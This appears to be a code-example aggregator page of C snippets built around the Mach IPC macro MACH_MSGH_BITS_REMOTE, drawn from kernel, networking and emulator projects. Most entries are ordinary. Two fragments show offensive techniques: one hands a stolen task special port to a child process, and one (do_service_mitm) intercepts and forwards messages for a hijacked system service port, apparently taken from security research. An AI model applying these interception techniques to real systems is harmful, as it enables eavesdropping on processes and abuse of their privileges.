Esempio n. 1
0
File: send.c Progetto: ctos/bpi
void send_integer( mach_port_t destination, int i )
{
    kern_return_t err;
    struct integer_message message;

    message.head.msgh_bits =MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MAKE_SEND);
    message.head.msgh_size = sizeof( struct integer_message );
    message.head.msgh_local_port = MACH_PORT_NULL;
    message.head.msgh_remote_port = destination;


    message.type.msgt_name = MACH_MSG_TYPE_INTEGER_32;
    message.type.msgt_size = 32;
    message.type.msgt_number = 1;
    message.type.msgt_inline = TRUE;
    message.type.msgt_longform = FALSE;
    message.type.msgt_deallocate = FALSE;

    message.inline_integer = i;

    err = mach_msg( &(message.head), MACH_SEND_MSG,message.head.msgh_size, 0, MACH_PORT_NULL,MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL );

    if( err == MACH_MSG_SUCCESS )
    {
        printf( "success: the message was queued\n" );
    }
    else
    {
        perror( "error: some unexpected error ocurred!\n");
    }

    return;
}
Esempio n. 2
0
void Connection::exceptionSourceEventHandler()
{
    ReceiveBuffer buffer;

    mach_msg_header_t* header = readFromMachPort(m_exceptionPort, buffer);
    if (!header)
        return;

    // We've read the exception message. Now send it on to the real exception port.

    // The remote port should have a send once right.
    ASSERT(MACH_MSGH_BITS_REMOTE(header->msgh_bits) == MACH_MSG_TYPE_MOVE_SEND_ONCE);

    // Now get the real exception port.
    mach_port_t exceptionPort = machExceptionPort();

    // First, get the complex bit from the source message.
    mach_msg_bits_t messageBits = header->msgh_bits & MACH_MSGH_BITS_COMPLEX;
    messageBits |= MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MOVE_SEND_ONCE);

    header->msgh_bits = messageBits;
    header->msgh_local_port = header->msgh_remote_port;
    header->msgh_remote_port = exceptionPort;

    // Now send along the message.
    kern_return_t kr = mach_msg(header, MACH_SEND_MSG, header->msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
    if (kr != KERN_SUCCESS) {
        LOG_ERROR("Failed to send message to real exception port. %s (%x)", mach_error_string(kr), kr);
        ASSERT_NOT_REACHED();
    }

    connectionDidClose();
}
Esempio n. 3
0
File: send.c Progetto: ctos/bpi
void send(mach_port_t dest, int data)
{
	kern_return_t err;
	struct message mess;


	mess.head.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MAKE_SEND);
	mess.head.msgh_size = sizeof (struct message);
	mess.head.msgh_local_port = MACH_PORT_NULL;
	mess.head.msgh_remote_port = dest;

	mess.type.msgt_name = MACH_MSG_TYPE_INTEGER_32;
	mess.type.msgt_size = 32;
	mess.type.msgt_number = 1;
	mess.type.msgt_inline = TRUE;
	mess.type.msgt_longform = FALSE;
	mess.type.msgt_deallocate = FALSE;

	mess.integer = data;

	err = mach_msg_send(&(mess.head));
	if (err == MACH_MSG_SUCCESS)
	{
		printf("SUCCESS: THE MESSAGE WAS SENT.\n");
	}
}
Esempio n. 4
0
//------------------------------------------------------------------------------
// __NoMoreSenders
//------------------------------------------------------------------------------
Boolean __NoMoreSenders(mach_msg_header_t *request, mach_msg_header_t *reply)
{
	mach_no_senders_notification_t	*Request = (mach_no_senders_notification_t *)request;
	mig_reply_error_t               *Reply   = (mig_reply_error_t *)reply;

	reply->msgh_bits        = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(request->msgh_bits), 0);
	reply->msgh_remote_port = request->msgh_remote_port;
	reply->msgh_size        = sizeof(mig_reply_error_t);	// Minimal size: update as needed
	reply->msgh_local_port  = MACH_PORT_NULL;
	reply->msgh_id          = request->msgh_id + 100;

	if ((Request->not_header.msgh_id > MACH_NOTIFY_LAST) ||
	    (Request->not_header.msgh_id < MACH_NOTIFY_FIRST)) {
		Reply->NDR     = NDR_record;
		Reply->RetCode = MIG_BAD_ID;
		return FALSE;	// if this is not a notification message 
	}

	switch (Request->not_header.msgh_id) {
		case MACH_NOTIFY_NO_SENDERS :
			Reply->Head.msgh_bits		= 0;
			Reply->Head.msgh_remote_port	= MACH_PORT_NULL;
			Reply->RetCode			= KERN_SUCCESS;
			return TRUE;
		default :
			break;
	}

	Reply->NDR     = NDR_record;
	Reply->RetCode = MIG_BAD_ID;
	return FALSE;	// if this is not a notification we are handling
}
Esempio n. 5
0
static void encode_reply(mig_reply_error_t *reply, mach_msg_header_t *hdr, int code) {
	mach_msg_header_t *rh = &reply->Head;
	rh->msgh_bits = MACH_MSGH_BITS (MACH_MSGH_BITS_REMOTE (hdr->msgh_bits), 0);
	rh->msgh_remote_port = hdr->msgh_remote_port;
	rh->msgh_size = (mach_msg_size_t) sizeof (mig_reply_error_t);
	rh->msgh_local_port = MACH_PORT_NULL;
	rh->msgh_id = hdr->msgh_id + 100;
	reply->NDR = NDR_record;
	reply->RetCode = code;
}
void MachRunLoopServer::oneRequest(const Message &request)
{
	if (!handle(request, mReplyMessage)) {	// MIG dispatch failed
		secdebug("machrls", "MachRunLoopServer dispatch failed");
	} else {
		// MIG dispatch handled the call. Send reply back to caller.
		mReplyMessage.send((MACH_MSGH_BITS_REMOTE(mReplyMessage.bits()) == MACH_MSG_TYPE_MOVE_SEND_ONCE) ?
			MACH_SEND_MSG :	MACH_SEND_MSG|MACH_SEND_TIMEOUT);
	}
	active().releaseDeferredAllocations();
}
Esempio n. 7
0
static boolean_t handle_server_message(struct DummyMsg_t *requestMsg, struct DummyMsg_t *replyMsg) {
    mig_reply_error_t * request = (mig_reply_error_t *)requestMsg;
    mig_reply_error_t *	reply = (mig_reply_error_t *)replyMsg;
    mach_msg_return_t r = MACH_MSG_SUCCESS;
    mach_msg_options_t options = 0;

    boolean_t handled = iHaxGamezHelper_server((mach_msg_header_t *)request, (mach_msg_header_t *)reply);
    //if (ERR_FILE) fprintf(ERR_FILE, "Got back %d\n", handled);
    if (handled) {
    /* Copied from Libc/mach/mach_msg.c:mach_msg_server_once(): Start */
        if (!(reply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
            if (reply->RetCode == MIG_NO_REPLY)
                reply->Head.msgh_remote_port = MACH_PORT_NULL;
            else if ((reply->RetCode != KERN_SUCCESS) &&
                     (request->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
                /* destroy the request - but not the reply port */
                request->Head.msgh_remote_port = MACH_PORT_NULL;
                mach_msg_destroy(&request->Head);
            }
        }
        /*
         *	We don't want to block indefinitely because the client
         *	isn't receiving messages from the reply port.
         *	If we have a send-once right for the reply port, then
         *	this isn't a concern because the send won't block.
         *	If we have a send right, we need to use MACH_SEND_TIMEOUT.
         *	To avoid falling off the kernel's fast RPC path unnecessarily,
         *	we only supply MACH_SEND_TIMEOUT when absolutely necessary.
         */
        if (reply->Head.msgh_remote_port != MACH_PORT_NULL) {
            r = mach_msg(&reply->Head,
                         (MACH_MSGH_BITS_REMOTE(reply->Head.msgh_bits) ==
                          MACH_MSG_TYPE_MOVE_SEND_ONCE) ?
                         MACH_SEND_MSG|options :
                         MACH_SEND_MSG|MACH_SEND_TIMEOUT|options,
                         reply->Head.msgh_size, 0, MACH_PORT_NULL,
                         MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
            if ((r != MACH_SEND_INVALID_DEST) &&
                (r != MACH_SEND_TIMED_OUT))
                goto done_once;
        }
        if (reply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)
            mach_msg_destroy(&reply->Head);
     done_once:
        /* Copied from Libc/mach/mach_msg.c:mach_msg_server_once(): End */
        ;
    }
    return handled;
    
}
Esempio n. 8
0
/* -----------------------------------------------------------------------------
----------------------------------------------------------------------------- */
void
server_handle_request(CFMachPortRef port, void *msg, CFIndex size, void *info)
{
    mach_msg_return_t 	r;
    mach_msg_header_t *	request = (mach_msg_header_t *)msg;
    mach_msg_header_t *	reply;
    char		reply_s[128] __attribute__ ((aligned (4)));		// Wcast-align fix - force alignment

    if (process_notification(request) == FALSE) {
		if (_pppcontroller_subsystem.maxsize > sizeof(reply_s)) {
			syslog(LOG_ERR, "PPPController: %d > %ld",
				_pppcontroller_subsystem.maxsize, sizeof(reply_s));
			reply = (mach_msg_header_t *)
			malloc(_pppcontroller_subsystem.maxsize);
		}
		else {
			reply = ALIGNED_CAST(mach_msg_header_t *)reply_s;
		}
		if (pppcontroller_server(request, reply) == FALSE) {
			syslog(LOG_INFO, "unknown message ID (%d) received",
			   request->msgh_id);
			mach_msg_destroy(request);
		}
		else {
			int		options;

			options = MACH_SEND_MSG;
			if (MACH_MSGH_BITS_REMOTE(reply->msgh_bits) == MACH_MSG_TYPE_MOVE_SEND) {
				options |= MACH_SEND_TIMEOUT;
			}
			r = mach_msg(reply,
				 options,
				 reply->msgh_size,
				 0,
				 MACH_PORT_NULL,
				 MACH_MSG_TIMEOUT_NONE,
				 MACH_PORT_NULL);
			if (r != MACH_MSG_SUCCESS) {
				syslog(LOG_INFO, "PPPController: mach_msg(send): %s", 
					mach_error_string(r));
				mach_msg_destroy(reply);
			}
		}
		if (reply != ALIGNED_CAST(mach_msg_header_t *)reply_s) {
			free(reply);
		}
    }
    return;
}
Esempio n. 9
0
void PAL_DispatchException(PCONTEXT pContext, PEXCEPTION_RECORD pExRecord)
{

    MSG_SET_THREAD MsgSet;
    kern_return_t MachRet;
    EXCEPTION_POINTERS pointers;

    pointers.ExceptionRecord = pExRecord;
    pointers.ContextRecord = pContext;

    // Raise the exception
    SEHRaiseException(&pointers, 0);

    // We need to send a message to the worker thread so that it can set our thread context

    // Setup the heaer
    MsgSet.m_MsgHdr.msgh_size = sizeof(MsgSet);
    MsgSet.m_MsgHdr.msgh_bits = MACH_MSGH_BITS_REMOTE(MACH_MSG_TYPE_MAKE_SEND|MACH_MSG_TYPE_MOVE_RECEIVE); // Simple Message
    MsgSet.m_MsgHdr.msgh_remote_port = s_ExceptionPort; // Send, dest port
    MsgSet.m_MsgHdr.msgh_local_port = MACH_PORT_NULL;   // We're not expecting a msg back
    MsgSet.m_MsgHdr.msgh_id = SET_THREAD_MESSAGE_ID; // Message ID
    MsgSet.m_MsgHdr.msgh_reserved = 0; // Not used

    // Setup the thread and thread context
    MsgSet.m_ThreadPort = mach_thread_self();
    MsgSet.m_ThreadContext = *pContext;

    // Send the  message to the exception port
    MachRet = mach_msg(&MsgSet.m_MsgHdr,
                       MACH_SEND_MSG,
                       MsgSet.m_MsgHdr.msgh_size,
                       0,
                       MACH_PORT_NULL,
                       MACH_MSG_TIMEOUT_NONE,
                       MACH_PORT_NULL);

    if (MachRet != KERN_SUCCESS)
    {
        UTIL_SetLastErrorFromMach(MachRet);
        ExitProcess(GetLastError());
    }

    // Make sure we don't do anything
    while(1)
    {
        sched_yield();
    }
}
Esempio n. 10
0
void
exception_raise_continue_fast(
	ipc_port_t reply_port,
	ipc_kmsg_t kmsg)
{
	ipc_thread_t self = current_thread();
	kern_return_t kr;

	assert(ip_active(reply_port));
	assert(reply_port == self->ith_port);
	assert(reply_port == (ipc_port_t) kmsg->ikm_header.msgh_remote_port);
	assert(MACH_MSGH_BITS_REMOTE(kmsg->ikm_header.msgh_bits) ==
						MACH_MSG_TYPE_PORT_SEND_ONCE);

	/*
	 *	Release the send-once right (from the message header)
	 *	and the saved reference (from self->ith_port).
	 */

	reply_port->ip_sorights--;
	ip_release(reply_port);
	ip_release(reply_port);
	ip_unlock(reply_port);

	/*
	 *	Consume the reply message.
	 */

	kr = exception_parse_reply(kmsg);
	if (kr == KERN_SUCCESS) {
		thread_exception_return();
		/*NOTREACHED*/
	}

	if (self->ith_exc != KERN_SUCCESS) {
		exception_try_task(self->ith_exc,
				   self->ith_exc_code,
				   self->ith_exc_subcode);
		/*NOTREACHED*/
	}

	exception_no_server();
	/*NOTREACHED*/
}
Esempio n. 11
0
STATIC void
server_handle_request(CFMachPortRef port, void * msg, CFIndex size, void * info)
{
    mach_msg_return_t 	r;
    mach_msg_header_t *	request = (mach_msg_header_t *)msg;
    mach_msg_header_t *	reply;
    char		reply_s[eapolcfg_auth_subsystem.maxsize];

    if (process_notification(request) == FALSE) {
	reply = (mach_msg_header_t *)reply_s;
	if (eapolcfg_auth_server(request, reply) == FALSE) {
	    syslog(LOG_NOTICE,
		   "eapolcfg_auth: unknown message ID (%d)",
		   request->msgh_id);
	    mach_msg_destroy(request);
	}
	else {
	    int		options;

	    S_handled_request = TRUE;

	    options = MACH_SEND_MSG;
	    if (MACH_MSGH_BITS_REMOTE(reply->msgh_bits)
                != MACH_MSG_TYPE_MOVE_SEND_ONCE) {
		options |= MACH_SEND_TIMEOUT;
	    }
	    r = mach_msg(reply,
			 options,
			 reply->msgh_size,
			 0,
			 MACH_PORT_NULL,
			 MACH_MSG_TIMEOUT_NONE,
			 MACH_PORT_NULL);
	    if (r != MACH_MSG_SUCCESS) {
		syslog(LOG_NOTICE, "eapolcfg_auth: mach_msg(send): %s", 
		       mach_error_string(r));
		mach_msg_destroy(reply);
	    }
	}
    }
    return;
}
Esempio n. 12
0
static void protBuildReply(protReplyStruct *reply,
                           protRequestStruct *request,
                           kern_return_t ret_code)
{
  mach_msg_size_t state_size;
  reply->Head.msgh_bits =
    MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(request->Head.msgh_bits), 0);
  reply->Head.msgh_remote_port = request->Head.msgh_remote_port;
  reply->Head.msgh_local_port = MACH_PORT_NULL;
  reply->Head.msgh_reserved = 0;
  reply->Head.msgh_id = request->Head.msgh_id + 100;
  reply->NDR = request->NDR;
  reply->RetCode = ret_code;
  reply->flavor = request->flavor;
  reply->new_stateCnt = request->old_stateCnt;
  state_size = reply->new_stateCnt * sizeof(natural_t);
  AVER(sizeof(reply->new_state) >= state_size);
  memcpy(reply->new_state, request->old_state, state_size);
  /* If you use sizeof(reply) for reply->Head.msgh_size then the state
     gets ignored. */
  reply->Head.msgh_size = offsetof(protReplyStruct, new_state) + state_size;
}
Esempio n. 13
0
mach_port_t recover_shared_port_parent() {
  kern_return_t err;

  // restore the special port for ourselves
  err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, saved_special_port);
  MACH_ERR("parent restoring special port", err);

  // wait for a message from the child on the shared port
  simple_msg_rcv_t msg = {0};
  err = mach_msg(&msg.header,
                 MACH_RCV_MSG,
                 0,
                 sizeof(msg),
                 shared_port_parent,
                 MACH_MSG_TIMEOUT_NONE,
                 MACH_PORT_NULL);
  MACH_ERR("parent receiving child hello message", err);

  LOG("parent received hello message from child");

  // send the special port to our child over the hello message's reply port
  port_msg_send_t special_port_msg = {0};

  special_port_msg.header.msgh_size        = sizeof(special_port_msg);
  special_port_msg.header.msgh_local_port  = MACH_PORT_NULL;
  special_port_msg.header.msgh_remote_port = msg.header.msgh_remote_port;
  special_port_msg.header.msgh_bits        = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(msg.header.msgh_bits), 0) | MACH_MSGH_BITS_COMPLEX;
  special_port_msg.body.msgh_descriptor_count = 1;

  special_port_msg.port.name        = saved_special_port;
  special_port_msg.port.disposition = MACH_MSG_TYPE_COPY_SEND;
  special_port_msg.port.type        = MACH_MSG_PORT_DESCRIPTOR;

  err = mach_msg_send(&special_port_msg.header);
  MACH_ERR("parent sending special port back to child", err);

  return shared_port_parent;
}
Esempio n. 14
0
__private_extern__
boolean_t
config_demux(mach_msg_header_t *request, mach_msg_header_t *reply)
{
	Boolean				processed = FALSE;

	/*
	 * (attempt to) process SCDynamicStore requests.
	 */
	processed = config_server(request, reply);
	if (processed) {
		return TRUE;
	}

	/*
	 * (attempt to) process (NO MORE SENDERS) notification messages.
	 */
	processed = notify_server(request, reply);
	if (processed) {
		return TRUE;
	}

	/*
	 * unknown message ID, log and return an error.
	 */
	SCLog(TRUE, LOG_ERR, CFSTR("config_demux(): unknown message ID (%d) received"), request->msgh_id);
	reply->msgh_bits        = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(request->msgh_bits), 0);
	reply->msgh_remote_port = request->msgh_remote_port;
	reply->msgh_size        = sizeof(mig_reply_error_t);	/* Minimal size */
	reply->msgh_local_port  = MACH_PORT_NULL;
	reply->msgh_id          = request->msgh_id + 100;
	((mig_reply_error_t *)reply)->NDR = NDR_record;
	((mig_reply_error_t *)reply)->RetCode = MIG_BAD_ID;

	return FALSE;
}
Esempio n. 15
0
static void ExceptionThread(mach_port_t port)
{
	Common::SetCurrentThreadName("Mach exception thread");
	#pragma pack(4)
	struct
	{
		mach_msg_header_t Head;
		NDR_record_t NDR;
		exception_type_t exception;
		mach_msg_type_number_t codeCnt;
		int64_t code[2];
		int flavor;
		mach_msg_type_number_t old_stateCnt;
		natural_t old_state[x86_THREAD_STATE64_COUNT];
		mach_msg_trailer_t trailer;
	} msg_in;

	struct
	{
		mach_msg_header_t Head;
		NDR_record_t NDR;
		kern_return_t RetCode;
		int flavor;
		mach_msg_type_number_t new_stateCnt;
		natural_t new_state[x86_THREAD_STATE64_COUNT];
	} msg_out;
	#pragma pack()
	memset(&msg_in, 0xee, sizeof(msg_in));
	memset(&msg_out, 0xee, sizeof(msg_out));
	mach_msg_header_t *send_msg = nullptr;
	mach_msg_size_t send_size = 0;
	mach_msg_option_t option = MACH_RCV_MSG;
	while (true)
	{
		// If this isn't the first run, send the reply message.  Then, receive
		// a message: either a mach_exception_raise_state RPC due to
		// thread_set_exception_ports, or MACH_NOTIFY_NO_SENDERS due to
		// mach_port_request_notification.
		CheckKR("mach_msg_overwrite", mach_msg_overwrite(send_msg, option, send_size, sizeof(msg_in), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL, &msg_in.Head, 0));

		if (msg_in.Head.msgh_id == MACH_NOTIFY_NO_SENDERS)
		{
			// the other thread exited
			mach_port_destroy(mach_task_self(), port);
			return;
		}

		if (msg_in.Head.msgh_id != 2406)
		{
			PanicAlert("unknown message received");
			return;
		}

		if (msg_in.flavor != x86_THREAD_STATE64)
		{
			PanicAlert("unknown flavor %d (expected %d)", msg_in.flavor, x86_THREAD_STATE64);
			return;
		}

		x86_thread_state64_t *state = (x86_thread_state64_t *) msg_in.old_state;

		bool ok = JitInterface::HandleFault((uintptr_t) msg_in.code[1], state);

		// Set up the reply.
		msg_out.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(msg_in.Head.msgh_bits), 0);
		msg_out.Head.msgh_remote_port = msg_in.Head.msgh_remote_port;
		msg_out.Head.msgh_local_port = MACH_PORT_NULL;
		msg_out.Head.msgh_id = msg_in.Head.msgh_id + 100;
		msg_out.NDR = msg_in.NDR;
		if (ok)
		{
			msg_out.RetCode = KERN_SUCCESS;
			msg_out.flavor = x86_THREAD_STATE64;
			msg_out.new_stateCnt = x86_THREAD_STATE64_COUNT;
			memcpy(msg_out.new_state, msg_in.old_state, x86_THREAD_STATE64_COUNT * sizeof(natural_t));
		}
		else
		{
			// Pass the exception to the next handler (debugger or crash).
			msg_out.RetCode = KERN_FAILURE;
			msg_out.flavor = 0;
			msg_out.new_stateCnt = 0;
		}
		msg_out.Head.msgh_size = offsetof(__typeof__(msg_out), new_state) + msg_out.new_stateCnt * sizeof(natural_t);

		send_msg = &msg_out.Head;
		send_size = msg_out.Head.msgh_size;
		option |= MACH_SEND_MSG;
	}
}
Esempio n. 16
0
ipc_kmsg_t
ipc_kobject_server(
	ipc_kmsg_t	request)
{
	mach_msg_size_t reply_size;
	ipc_kmsg_t reply;
	kern_return_t kr;
	ipc_port_t *destp;
	mach_msg_format_0_trailer_t *trailer;
	register mig_hash_t *ptr;

	/*
	 * Find out corresponding mig_hash entry if any
	 */
	{
	    register int key = request->ikm_header->msgh_id;
	    register int i = MIG_HASH(key);
	    register int max_iter = mig_table_max_displ;
	
	    do
		ptr = &mig_buckets[i++ % MAX_MIG_ENTRIES];
	    while (key != ptr->num && ptr->num && --max_iter);

	    if (!ptr->routine || key != ptr->num) {
	        ptr = (mig_hash_t *)0;
		reply_size = mig_reply_size;
	    } else {
		reply_size = ptr->size;
#if	MACH_COUNTER
		ptr->callcount++;
#endif
	    }
	}

	/* round up for trailer size */
        reply_size += MAX_TRAILER_SIZE;
	reply = ipc_kmsg_alloc(reply_size);

	if (reply == IKM_NULL) {
		printf("ipc_kobject_server: dropping request\n");
		ipc_kmsg_destroy(request);
		return IKM_NULL;
	}

	/*
	 * Initialize reply message.
	 */
	{
#define	InP	((mach_msg_header_t *) request->ikm_header)
#define	OutP	((mig_reply_error_t *) reply->ikm_header)

	    /* 
	     * MIG should really assure no data leakage -
	     * but until it does, pessimistically zero the
	     * whole reply buffer.
	     */
	    bzero((void *)OutP, reply_size);

	    OutP->NDR = NDR_record;
	    OutP->Head.msgh_size = sizeof(mig_reply_error_t);

	    OutP->Head.msgh_bits =
		MACH_MSGH_BITS_SET(MACH_MSGH_BITS_LOCAL(InP->msgh_bits), 0, 0, 0);
	    OutP->Head.msgh_remote_port = InP->msgh_local_port;
	    OutP->Head.msgh_local_port = MACH_PORT_NULL;
	    OutP->Head.msgh_voucher_port = MACH_PORT_NULL;
	    OutP->Head.msgh_id = InP->msgh_id + 100;

#undef	InP
#undef	OutP
	}

	/*
	 * Find the routine to call, and call it
	 * to perform the kernel function
	 */
	{
	    if (ptr) {	
		(*ptr->routine)(request->ikm_header, reply->ikm_header);
		kernel_task->messages_received++;
	    }
	    else {
		if (!ipc_kobject_notify(request->ikm_header, reply->ikm_header)){
#if	MACH_IPC_TEST
		    printf("ipc_kobject_server: bogus kernel message, id=%d\n",
			request->ikm_header->msgh_id);
#endif	/* MACH_IPC_TEST */
		    _MIG_MSGID_INVALID(request->ikm_header->msgh_id);

		    ((mig_reply_error_t *) reply->ikm_header)->RetCode
			= MIG_BAD_ID;
		}
		else
		  kernel_task->messages_received++;
	    }
	    kernel_task->messages_sent++;
	}

	/*
	 *	Destroy destination. The following code differs from
	 *	ipc_object_destroy in that we release the send-once
	 *	right instead of generating a send-once notification
	 * 	(which would bring us here again, creating a loop).
	 *	It also differs in that we only expect send or
	 *	send-once rights, never receive rights.
	 *
	 *	We set msgh_remote_port to IP_NULL so that the kmsg
	 *	destroy routines don't try to destroy the port twice.
	 */
	destp = (ipc_port_t *) &request->ikm_header->msgh_remote_port;
	switch (MACH_MSGH_BITS_REMOTE(request->ikm_header->msgh_bits)) {
		case MACH_MSG_TYPE_PORT_SEND:
		    ipc_port_release_send(*destp);
		    break;
		
		case MACH_MSG_TYPE_PORT_SEND_ONCE:
		    ipc_port_release_sonce(*destp);
		    break;
		
		default:
		    panic("ipc_kobject_server: strange destination rights");
	}
	*destp = IP_NULL;

	/*
	 *	Destroy voucher.  The kernel MIG servers never take ownership
	 *	of vouchers sent in messages.  Swallow any such rights here.
	 */
	if (IP_VALID(request->ikm_voucher)) {
		assert(MACH_MSG_TYPE_PORT_SEND ==
		       MACH_MSGH_BITS_VOUCHER(request->ikm_header->msgh_bits));
		ipc_port_release_send(request->ikm_voucher);
		request->ikm_voucher = IP_NULL;
	}

        if (!(reply->ikm_header->msgh_bits & MACH_MSGH_BITS_COMPLEX) &&
           ((mig_reply_error_t *) reply->ikm_header)->RetCode != KERN_SUCCESS)
	 	kr = ((mig_reply_error_t *) reply->ikm_header)->RetCode;
	else
		kr = KERN_SUCCESS;

	if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
		/*
		 *	The server function is responsible for the contents
		 *	of the message.  The reply port right is moved
		 *	to the reply message, and we have deallocated
		 *	the destination port right, so we just need
		 *	to free the kmsg.
		 */
		ipc_kmsg_free(request);

	} else {
		/*
		 *	The message contents of the request are intact.
		 *	Destroy everthing except the reply port right,
		 *	which is needed in the reply message.
		 */
		request->ikm_header->msgh_local_port = MACH_PORT_NULL;
		ipc_kmsg_destroy(request);
	}

	if (kr == MIG_NO_REPLY) {
		/*
		 *	The server function will send a reply message
		 *	using the reply port right, which it has saved.
		 */

		ipc_kmsg_free(reply);

		return IKM_NULL;
	} else if (!IP_VALID((ipc_port_t)reply->ikm_header->msgh_remote_port)) {
		/*
		 *	Can't queue the reply message if the destination
		 *	(the reply port) isn't valid.
		 */

		ipc_kmsg_destroy(reply);

		return IKM_NULL;
	}

 	trailer = (mach_msg_format_0_trailer_t *)
		((vm_offset_t)reply->ikm_header + (int)reply->ikm_header->msgh_size);

 	trailer->msgh_sender = KERNEL_SECURITY_TOKEN;
 	trailer->msgh_trailer_type = MACH_MSG_TRAILER_FORMAT_0;
 	trailer->msgh_trailer_size = MACH_MSG_TRAILER_MINIMUM_SIZE;

	return reply;
}
void do_service_mitm(mach_port_t real_service_port, mach_port_t replacer_portset) {
  mach_msg_size_t max_request_size = 0x10000;
  mach_msg_header_t* request = malloc(max_request_size);
  
  for(;;) {
    memset(request, 0, max_request_size);
    kern_return_t err = mach_msg(request,
                                 MACH_RCV_MSG |
                                 MACH_RCV_LARGE, // leave larger messages in the queue
                                 0,
                                 max_request_size,
                                 replacer_portset,
                                 0,
                                 0);
    
    if (err == MACH_RCV_TOO_LARGE) {
      // bump up the buffer size
      mach_msg_size_t new_size = request->msgh_size + 0x1000;
      request = realloc(request, new_size);
      // try to receive again
      continue;
    }
    
    if (err != KERN_SUCCESS) {
      printf("error receiving on port set: %s\n", mach_error_string(err));
      exit(EXIT_FAILURE);
    }
    
    got_replaced_with = request->msgh_local_port;
    
    printf("got a request, fixing it up...\n");
    
    // fix up the message such that it can be forwarded:
    
    // get the rights we were sent for each port the header
    mach_port_right_t remote = MACH_MSGH_BITS_REMOTE(request->msgh_bits);
    mach_port_right_t voucher = MACH_MSGH_BITS_VOUCHER(request->msgh_bits);
    
    // fixup the header ports:
    // swap the remote port we received into the local port we'll forward
    // this means we're only mitm'ing in one direction - we could also
    // intercept these replies if necessary
    request->msgh_local_port = request->msgh_remote_port;
    request->msgh_remote_port = real_service_port;
    // voucher port stays the same
    
    int is_complex = MACH_MSGH_BITS_IS_COMPLEX(request->msgh_bits);
    
    // (remote, local, voucher)
    request->msgh_bits = MACH_MSGH_BITS_SET_PORTS(MACH_MSG_TYPE_COPY_SEND, right_fixup(remote), right_fixup(voucher));
    
    if (is_complex) {
      request->msgh_bits |= MACH_MSGH_BITS_COMPLEX;
      
      // if it's complex we also need to fixup all the descriptors...
      mach_msg_body_t* body = (mach_msg_body_t*)(request+1);
      mach_msg_type_descriptor_t* desc = (mach_msg_type_descriptor_t*)(body+1);
      for (mach_msg_size_t i = 0; i < body->msgh_descriptor_count; i++) {
        switch (desc->type) {
          case MACH_MSG_PORT_DESCRIPTOR: {
            mach_msg_port_descriptor_t* port_desc = (mach_msg_port_descriptor_t*)desc;
            inspect_port(port_desc->name);
            port_desc->disposition = right_fixup(port_desc->disposition);
            desc = (mach_msg_type_descriptor_t*)(port_desc+1);
            break;
          }
            
          case MACH_MSG_OOL_VOLATILE_DESCRIPTOR:
          case MACH_MSG_OOL_DESCRIPTOR: {
            mach_msg_ool_descriptor_t* ool_desc = (mach_msg_ool_descriptor_t*)desc;
            // make sure that deallocate is true; we don't want to keep this memory:
            ool_desc->deallocate = 1;
            desc = (mach_msg_type_descriptor_t*)(ool_desc+1);
            break;
          }

          case MACH_MSG_OOL_PORTS_DESCRIPTOR: {
            mach_msg_ool_ports_descriptor_t* ool_ports_desc = (mach_msg_ool_ports_descriptor_t*)desc;
            // make sure that deallocate is true:
            ool_ports_desc->deallocate = 1;
            ool_ports_desc->disposition = right_fixup(ool_ports_desc->disposition);
            desc = (mach_msg_type_descriptor_t*)(ool_ports_desc+1);
            break;
          }
        }
      }
      
    }
    
    printf("fixed up request, forwarding it\n");
    
    // forward the message:
    err = mach_msg(request,
                   MACH_SEND_MSG|MACH_MSG_OPTION_NONE,
                   request->msgh_size,
                   0,
                   MACH_PORT_NULL,
                   MACH_MSG_TIMEOUT_NONE,
                   MACH_PORT_NULL);
    
    if (err != KERN_SUCCESS) {
      printf("error forwarding service message: %s\n", mach_error_string(err));
      exit(EXIT_FAILURE);
    }
  }
}
/*
 * The meat of our exception handler. This thread waits for an exception
 * message, annotates the exception if needed, then forwards it to the
 * previously installed handler (which will likely terminate the process).
 */
static void
MachExceptionHandler()
{
    kern_return_t ret;
    MachExceptionParameters& current = sMachExceptionState.current;
    MachExceptionParameters& previous = sMachExceptionState.previous;

    // We use the simplest kind of 64-bit exception message here.
    ExceptionRequest64 request = {};
    request.header.msgh_local_port = current.port;
    request.header.msgh_size = static_cast<mach_msg_size_t>(sizeof(request));
    ret = mach_msg(&request.header, MACH_RCV_MSG, 0, request.header.msgh_size,
                   current.port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

    // Restore the previous handler. We're going to forward to it
    // anyway, and if we crash while doing so we don't want to hang.
    task_set_exception_ports(mach_task_self(), previous.mask, previous.port,
                             previous.behavior, previous.flavor);

    // If we failed even receiving the message, just give up.
    if (ret != MACH_MSG_SUCCESS)
        MOZ_CRASH("MachExceptionHandler: mach_msg failed to receive a message!");

    // Terminate the thread if we're shutting down.
    if (request.header.msgh_id == sIDQuit)
        return;

    // The only other valid message ID is the one associated with the
    // EXCEPTION_DEFAULT | MACH_EXCEPTION_CODES behavior we chose.
    if (request.header.msgh_id != sIDRequest64)
        MOZ_CRASH("MachExceptionHandler: Unexpected Message ID!");

    // Make sure we can understand the exception we received.
    if (request.exception != EXC_BAD_ACCESS || request.code_count != 2)
        MOZ_CRASH("MachExceptionHandler: Unexpected exception type!");

    // Get the address that the offending code tried to access.
    uintptr_t address = uintptr_t(request.code[1]);

    // If the faulting address is inside one of our protected regions, we
    // want to annotate the crash to make it stand out from the crowd.
    if (sProtectedRegions.isProtected(address)) {
        ReportCrashIfDebug("Hit MOZ_CRASH(Tried to access a protected region!)\n");
        MOZ_CRASH_ANNOTATE("MOZ_CRASH(Tried to access a protected region!)");
    }

    // Forward to the previous handler which may be a debugger, the unix
